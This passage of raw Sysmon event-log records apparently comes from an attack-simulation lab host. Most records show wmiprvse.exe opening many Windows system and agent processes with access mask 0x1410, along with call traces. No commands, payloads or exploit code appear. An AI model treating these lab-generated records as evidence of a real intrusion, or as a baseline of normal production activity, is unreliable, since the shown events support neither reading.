|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000001698176Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:50.024{05ADC7E1-70EB-603D-6E88-00000000AD01}68685148C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-29F2-6039-CA05-00000000AD01}4956C:\Windows\System32\rdpclip.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000001698175Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:50.023{05ADC7E1-70EB-603D-6E88-00000000AD01}68685148C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-29F0-6039-C405-00000000AD01}5096C:\Windows\system32\dwm.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 23542300x80000000000000001698174Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:50.022{05ADC7E1-FB2E-603C-9079-00000000AD01}4328NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=4A99D6AB614169FF5B1A7F4744FBBF72,SHA256=4D20D23B5E27CB99F8069B99A765BD541CFE0EA2172BC7ECB078349DDD1403C7,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001698173Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:50.022{05ADC7E1-70EB-603D-6E88-00000000AD01}68685148C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-29F0-6039-C105-00000000AD01}1648C:\Windows\system32\winlogon.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000001698172Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:50.021{05ADC7E1-70EB-603D-6E88-00000000AD01}68685148C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-232D-6039-D900-00000000AD01}3148C:\Windows\System32\msdtc.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000001698171Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:50.005{05ADC7E1-70EB-603D-6E88-00000000AD01}68685148C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-22B4-6039-5500-00000000AD01}3736C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000001698170Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:50.005{05ADC7E1-70EB-603D-6E88-00000000AD01}68685148C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-22B4-6039-5100-00000000AD01}3532C:\Program Files\Amazon\SSM\ssm-agent-worker.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000001698169Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:50.005{05ADC7E1-70EB-603D-6E88-00000000AD01}68685148C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-22AF-6039-3200-00000000AD01}3220C:\Windows\System32\vds.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000001698168Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:50.005{05ADC7E1-70EB-603D-6E88-00000000AD01}68685148C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-22AF-6039-3000-00000000AD01}3052C:\Windows\system32\wbem\unsecapp.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000001698167Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:50.005{05ADC7E1-70EB-603D-6E88-00000000AD01}68685148C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-22AF-6039-2F00-00000000AD01}2724C:\Windows\system32\dfssvc.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000001698166Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:50.005{05ADC7E1-70EB-603D-6E88-00000000AD01}68685148C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-22AF-6039-2E00-00000000AD01}2684C:\Windows\ADWS\Microsoft.ActiveDirectory.WebServices.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000001698165Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:50.005{05ADC7E1-70EB-603D-6E88-00000000AD01}68685148C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-22AF-6039-2D00-00000000AD01}2664C:\Windows\system32\dns.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000001698164Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:50.005{05ADC7E1-70EB-603D-6E88-00000000AD01}68685148C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-22AF-6039-2C00-00000000AD01}2516C:\Windows\system32\DFSRs.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000001698163Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:50.005{05ADC7E1-70EB-603D-6E88-00000000AD01}68685148C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-22AF-6039-2A00-00000000AD01}2644C:\Windows\System32\ismserv.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000001698162Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:50.005{05ADC7E1-70EB-603D-6E88-00000000AD01}68685148C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-22AF-6039-2900-00000000AD01}2700C:\Program Files\Amazon\SSM\amazon-ssm-agent.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000001698161Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:50.005{05ADC7E1-70EB-603D-6E88-00000000AD01}68685148C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-22AF-6039-2800-00000000AD01}1936C:\Windows\sysmon64.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000001698160Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:50.005{05ADC7E1-70EB-603D-6E88-00000000AD01}68685148C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-22AF-6039-2700-00000000AD01}2776C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000001698159Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:50.005{05ADC7E1-70EB-603D-6E88-00000000AD01}68685148C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-22AF-6039-2600-00000000AD01}2596C:\Program Files\Amazon\XenTools\LiteAgent.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000001698158Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:50.005{05ADC7E1-70EB-603D-6E88-00000000AD01}68685148C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-22AF-6039-2500-00000000AD01}2284C:\Windows\System32\spoolsv.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000001698157Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:50.005{05ADC7E1-70EB-603D-6E88-00000000AD01}68685148C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-22A9-6039-2300-00000000AD01}2940C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000001698156Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:50.005{05ADC7E1-70EB-603D-6E88-00000000AD01}68685148C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-22A0-6039-2100-00000000AD01}2392C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\